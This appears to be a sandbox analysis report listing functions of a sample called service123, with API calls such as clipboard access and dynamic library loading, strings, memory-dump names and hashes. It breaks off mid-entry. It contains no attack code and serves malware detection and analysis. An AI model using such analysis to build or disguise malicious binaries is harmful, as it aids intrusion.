Opcode ID: f6b56483b99599c9482b3910497d4bfec98c7910020303c876a0dad5e0b0ef5b
Instruction ID: c46e979a0a2a68eb8e7bc1de36ee857926e8fced36f0f2e090a052f778cfc933
Opcode Fuzzy Hash: f6b56483b99599c9482b3910497d4bfec98c7910020303c876a0dad5e0b0ef5b
Instruction Fuzzy Hash: 622126323552098BC704CE1CD881A9673A6EBC636C728C5BEE8489BB15DA37A806C790

Function 6C2BE570 Relevance: 15.1, APIs: 10, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D51
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D56
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D5B
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D60
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D65
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6A
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D7E

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction ID: 153e6b0239a1bf94a49eea5274dd14edc66583e2d2c7693c8afb727329d4427a
Opcode Fuzzy Hash: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction Fuzzy Hash: 2741E47050830F8AD710DF29C04076AB7E1AF8139DF548A99FCB5A7A95E334D94E8BD2

Function 6C2BE59B Relevance: 15.1, APIs: 10, Instructions: 89COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D51
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D56
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D5B
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D60
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D65
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6A
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D7E

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction ID: 4a713b25a93c4ba62c38b842aef9162022d4098881a58021842648737e1a644c
Opcode Fuzzy Hash: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction Fuzzy Hash: 6621C77050530F8BD710DE28C19066AB7E1AF4139DF648E89FCB5A7A85E330D94ACBD2

Function 6C2BE714 Relevance: 15.0, APIs: 10, Instructions: 35COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D51
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D56
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D5B
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D60
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D65
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6A
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D7E

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction ID: 5d99b8e30974291ddc74c1ecea68b13e499e0e4d836c95122c72d936ab47836f
Opcode Fuzzy Hash: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction Fuzzy Hash: 7BE0DF3048820F8AC610CE28C061595B7949E4638CB400846ECE2A2E00E330D94E8B92

Function 6C2C9249 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C2C9260
GetProcAddress.KERNEL32 ref: 6C2C927A
LoadLibraryW.KERNEL32 ref: 6C2C929F
GetProcAddress.KERNEL32 ref: 6C2C92B3

Strings

advapi32.dll, xrefs: 6C2C9298
msvcrt.dll, xrefs: 6C2C9255
SystemFunction036, xrefs: 6C2C92A8
rand_s, xrefs: 6C2C926F

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 2038600c4c3f4c446370a70ed6f75fcca5ddeba2a42cf32e0699bc5dc0c67c43
Instruction ID: e25e250885a6230abb327dc709988d842cfbb62c59f24068bbabd936199fdb42
Opcode Fuzzy Hash: 2038600c4c3f4c446370a70ed6f75fcca5ddeba2a42cf32e0699bc5dc0c67c43
Instruction Fuzzy Hash: 0FF0FFB69553058BCB00BF78954624ABBB4BB06324F010A6DD9D597604E634E424CF67

Function 6C34F8C0 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C32DA2E), ref: 6C34F95D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C32DA2E), ref: 6C34F988
memmove.MSVCRT ref: 6C34F9D7
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C32DA2E), ref: 6C34FA0D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C32DA2E), ref: 6C34FA58

Strings

basic_string::_M_replace, xrefs: 6C34FBB6

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: 2edb307e4edf8482dfe93190d301b49e2aa88043f96bfe95482f576b5826e8f9
Instruction ID: a7ad5f3a7b511af39eb855f3847e0f000ef0851b8f66b2e943d45a8ff30803d6
Opcode Fuzzy Hash: 2edb307e4edf8482dfe93190d301b49e2aa88043f96bfe95482f576b5826e8f9
Instruction Fuzzy Hash: 1E81F275A093529FC301DF2CC19051EBBE5AFCA648F28895EE4D597725D232D888CFA3

Function 6C2BFEE0 Relevance: 13.7, APIs: 9, Instructions: 186synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C2C00D2
WaitForSingleObject.KERNEL32 ref: 6C2C0117

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: 7b1b2d9ba888bdd5e6b1c5c144ba5eb3dd64c1f217265caa31fac75fa48e5114
Instruction ID: 9470a249428f8197a68aabaaa8a6ba857f85967079a07bb252ff49dbeae16171
Opcode Fuzzy Hash: 7b1b2d9ba888bdd5e6b1c5c144ba5eb3dd64c1f217265caa31fac75fa48e5114
Instruction Fuzzy Hash: BA6167B870934ACFCB509F69C444797B7B8AB4734DF108629EC5997A80DB70E8498B92

Function 6C2BE760 Relevance: 13.6, APIs: 9, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction ID: 904573196073ea9eb3ad3750bb544c53af18748a522a2a7a30f3ed5f280252e1
Opcode Fuzzy Hash: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction Fuzzy Hash: 8701E575A1921E8FC700DA18C480A9AF7E5AB8539CF005DA9FC86A7B14D230D8CAD7C2

Function 6C2C32C0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C2C3391

Strings

o, xrefs: 6C2C3778
0, xrefs: 6C2C380E

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction ID: 1dc94ece0e3d9fb8f4b3220f524f53acb34733b5cf82b0e419d702df626548f6
Opcode Fuzzy Hash: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction Fuzzy Hash: EBF18F71B046098FCB41CF68C4806DDBBF2BF89364F198729E868AB791D734E945CB91

Function 00AC2BF0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00AC2CC1

Strings

0, xrefs: 00AC313E
o, xrefs: 00AC30A8

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction ID: da84945141303911ca8701703f43675643fb2b5e6d93bbebcc10de0631397807
Opcode Fuzzy Hash: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction Fuzzy Hash: 68F14F72A042098FCB15CF68C580B9DBBF2BF99360F1AC22DE855AB355D734E945CB90

Function 6C2B13E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 6C2B13F0
LoadLibraryA.KERNEL32 ref: 6C2B1406
GetProcAddress.KERNEL32 ref: 6C2B1425
GetProcAddress.KERNEL32 ref: 6C2B1437

Strings

libgcc_s_dw2-1.dll, xrefs: 6C2B13E9, 6C2B13FF
__deregister_frame_info, xrefs: 6C2B142C
__register_frame_info, xrefs: 6C2B141A

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: 621af5c43e475abdeac4743b30079a0b0ea12c4f371d9019cde56e941be25cba
Instruction ID: 1a62d86f9915a5082b746e48c3c1f0bcdbb7c0fc687c667fba6e0b1e0817f3d9
Opcode Fuzzy Hash: 621af5c43e475abdeac4743b30079a0b0ea12c4f371d9019cde56e941be25cba
Instruction Fuzzy Hash: 6A0171BA9063089FC700BF78A50725EBFB8AA46295F02442DDE8997A15DB30D454CFA3

Function 00AC14E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00AC14F0
LoadLibraryA.KERNEL32 ref: 00AC1506
GetProcAddress.KERNEL32 ref: 00AC1525
GetProcAddress.KERNEL32 ref: 00AC1537

Strings

__register_frame_info, xrefs: 00AC151A
__deregister_frame_info, xrefs: 00AC152C
libgcc_s_dw2-1.dll, xrefs: 00AC14E9, 00AC14FF

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: 3c7d47eb7cbf5676e6752eb879d0ce122ba0fecbe7a5807dc5291534895eab43
Instruction ID: a9911fd0a8956a9702bf31479c1d4b8ae767f74b7687dd728091f33c90469425
Opcode Fuzzy Hash: 3c7d47eb7cbf5676e6752eb879d0ce122ba0fecbe7a5807dc5291534895eab43
Instruction Fuzzy Hash: E90121B1A052088BC700BFB9A949B1EBFF4EB45755F07452DD58A87201E77588158BA3

Function 6C2D73C0 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 237stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 6C2D7411
strlen.MSVCRT ref: 6C2D742B
strlen.MSVCRT ref: 6C2D747B
strlen.MSVCRT ref: 6C2D74D8
strlen.MSVCRT ref: 6C2D752C

Strings

basic_string::append, xrefs: 6C2D76CA, 6C2D76D6, 6C2D76E2, 6C2D76EE
*, xrefs: 6C2D7660

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: strlen$strcmp
String ID: *$basic_string::append
API String ID: 551667898-3732199748
Opcode ID: 0219274c3da5bee0c302dde57352a0a3fe22d774cf6d0bdf9a717c7c7deb5211
Instruction ID: 673035b5ee17133f4c7589297f65b6911f2a0f74d5928c9c666178163546f27c
Opcode Fuzzy Hash: 0219274c3da5bee0c302dde57352a0a3fe22d774cf6d0bdf9a717c7c7deb5211
Instruction Fuzzy Hash: E9A12B716096058FDB00EF28C18065EBBF1BF45708F51896DE8949BB49E739E849CF93

Function 6C353DD0 Relevance: 12.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C353E6F
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C2EE9CE), ref: 6C353ED3
memmove.MSVCRT ref: 6C353F0B
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C2EE9CE), ref: 6C353F7A

Strings

basic_string::_M_replace, xrefs: 6C3540FF

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: e549f2c87013a2c9f89f4da45d2afea76c7e4bb144f079ebf5298b1c7bd30aa5
Instruction ID: 948e8db7ba7e8beaf897c6f64d66339d16512c32bbab1dd32b3d89e6e6e00ff6
Opcode Fuzzy Hash: e549f2c87013a2c9f89f4da45d2afea76c7e4bb144f079ebf5298b1c7bd30aa5
Instruction Fuzzy Hash: 07911435A093518FC344DF18C08095AFBF1BF89348F91896DE9899B724E731E9A4CF82

Function 6C2BE800 Relevance: 12.1, APIs: 8, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction ID: 64dbf3d2fad78fae275a2e22427c9c7105fc65fe4c52860ccbe28e60823f0bb5
Opcode Fuzzy Hash: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction Fuzzy Hash: 03210D31554A0ECFD700CE19C48198AB7A6AF8539DB14C955EC9567A34D330E48B87D2

Function 6C2C9BA6 Relevance: 12.1, APIs: 8, Instructions: 86clipboardCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 6C2C9BA9
IsClipboardFormatAvailable.USER32 ref: 6C2C9DDC
OpenClipboard.USER32 ref: 6C2C9DF0

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: Clipboard$AvailableCloseFormatHandleOpen
String ID:
API String ID: 518195572-0
Opcode ID: 8822ece389644bd330bdf772c6ee2f2dadaa54eaa36fe8a59229fd2357e95020
Instruction ID: ffa9a3fedf99a71b8d309fc2784863963c3bb29996a55eff07c21b24fc71346b
Opcode Fuzzy Hash: 8822ece389644bd330bdf772c6ee2f2dadaa54eaa36fe8a59229fd2357e95020
Instruction Fuzzy Hash: 662165B27042058FDB00BF7CD5495AEBBF4AB45349F050A39EC8696644EF34E558CB93

Function 00AC1E70 Relevance: 12.1, APIs: 8, Instructions: 84COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 00AC1EAF
signal.MSVCRT ref: 00AC1EF6
signal.MSVCRT ref: 00AC1F0F
signal.MSVCRT ref: 00AC1F36
signal.MSVCRT ref: 00AC1F72
signal.MSVCRT ref: 00AC1FBF
signal.MSVCRT ref: 00AC1FD5
signal.MSVCRT ref: 00AC1FEB

Memory Dump Source

